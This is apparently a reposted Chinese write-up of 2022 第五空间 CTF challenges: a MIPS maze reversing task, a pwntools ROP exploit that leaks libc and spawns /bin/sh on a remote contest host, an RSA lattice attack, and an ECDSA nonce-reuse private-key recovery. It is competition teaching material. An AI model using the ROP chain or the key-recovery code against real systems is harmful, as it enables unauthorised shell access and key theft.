-
5_re2
定义了 level。
核心是下面的 move 函数。
undefined8 move(void)
{
char cVar1;
int local_230;
int local_22c;
char local_228 [528];
undefined *local_18;
local_18 = &_mips_gp0_value;
local_22c = 0;
local_228[0] = '';
local_228[1] = 0;
memset(local_228 + 2,0,0x1fe);
printf("input: ");
__isoc99_scanf(&DAT_120001878,local_228);
while( true ) {
do {
local_230 = 0;
find();
cVar1 = local_228[local_22c];
if (cVar1 == 'w') {
local_230 = Up();
}
else if (cVar1 < 'x') {
if (cVar1 == 's') {
local_230 = Down();
}
else if (cVar1 < 't') {
if (cVar1 == 'd') {
local_230 = Right();
}
else if (cVar1 < 'e') {
if (cVar1 == 'x1b') {
return 0xffffffffffffffff;
}
if (cVar1 == 'a') {
local_230 = Left();
}
}
}
}
local_22c = local_22c + 1;
} while (local_230 != 1);
if (level == 2) break;
level = level + 1;
}
puts("flag is ctf{md5(your input)}");
return 1;
}
wasd 上下左右 , flag格式定义。
find 函数中的定义 ,决定了 迷宫 一行多少值。
处理下,得到各个level的 map表。
其中第一level的 整理后的迷宫表:
1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 0, 3, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0,
1, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0,
1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0,
1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0,
1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0,
1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 0, 3, 1, 1, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0,
1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 3, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 
-
5_1H3ll0Rop
from pwn import*
context(os='linux',arch='amd64')
context.log_level=True
elf=ELF('H3ll0Rop')
libc=ELF('libc-2.23.so')
#p = process(["./ld-2.27.so", "./a"],env={"LD_PRELOAD":"./libc-2.27.so"})
#p=process('./H3ll0Rop',env={'LD_PRELOAD':'./libc-2.23.so'})
#p=process('./H3ll0Rop')
p=remote('47.94.151.201',51850)
p.recvuntil('game with me???nn')
payload='a'*0x68+p64(0x0000000000400753)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x4006CC)
p.sendline(payload)
p.recvuntil('an pwn itnn')
puts=u64(p.recv(6).ljust(8,'x00'))
libcbase=puts-libc.sym['puts']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search('/bin/sh'))
print hex(libcbase)
p.recvuntil('game with me???nn')
payload='a'*0x68+p64(0x0000000000400753)+p64(binsh)+p64(system)
#gdb.attach(p)
raw_input()
p.sendline(payload)
p.interactive()
-
5_vgcd
with open("output7.txt") as f:
data = f.read().split("n")
n = eval(data[0])
c = eval(data[1])
t1 = eval(data[2])
t2 = eval(data[3])
M = Matrix(t1)
K = M.LLL()[-3:]
s = K.solve_left(M[:3])
for ss in s:
a = abs(ss[0])
b = abs(ss[2])
for i in range(2^6):
for j in range(2^6):
if gcd(a-i,b-j) > 2^10:
print(gcd(a-i,b-j))
pp = 313246472203572238616195801879608898722966109482769416302463071823547244571165975167479
eta = 288
gamma = 512
P.<x> = PolynomialRing(Zmod(n))
f = x+pp*2^(gamma-eta)
r = int(f.small_roots(X = 2^(gamma-eta), beta = 0.4)[0])
p = f(r)
from Crypto.Util.number import *
long_to_bytes(pow(c,int(pow(0x10001,-1,p-1)),int(p)))
-
5_wb
#!/usr/bin/env python
# coding: utf-8
# In[1]:
from ecdsa import ecdsa as ec
# In[2]:
r1 = 0xBBDFAC1809250A2BB9415225F7C548CF8C03A5E100F95D52A4AA27F42A2F0FBE
# In[3]:
r2 = 0xBBDFAC1809250A2BB9415225F7C548CF8C03A5E100F95D52A4AA27F42A2F0FBE
# In[4]:
s1 = 0x77FB1A7C7FEA54A2A6C7E7535C28868C10549B831411F7A8EBB9F6DE1B4ADDF6
# In[5]:
s2 = 0x31213DACD2339525C292FC69F8F828D23A3CA73567BACD8EA2ECE8BF653E97F6
# In[6]:
h1 = 0
# In[7]:
h2 = 0x1000000000000000000000000000000000000000000000000000000000000000
# In[11]:
g = ec.generator_256
n = g.order()
# In[12]:
n
# In[13]:
N = 115792089210356248762697446949407573529996955224135760342422259061068512044369
# In[14]:
import gmpy2
# In[15]:
k=((h1-h2)*gmpy2.invert((s1-s2),n))%n
# In[16]:
k
# In[17]:
d=((s1*k-h1)*gmpy2.invert(r1,n))%n
# In[18]:
d
# In[19]:
import libnum
# In[20]:
libnum.n2s(int(2761328357323929781063385491249486142671766712847109466352079855419392))
原文始发于微信公众号(山石网科安全技术研究院):2022年第五空间网络安全大赛WriteUp | Reverse & Pwn & Crypto
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论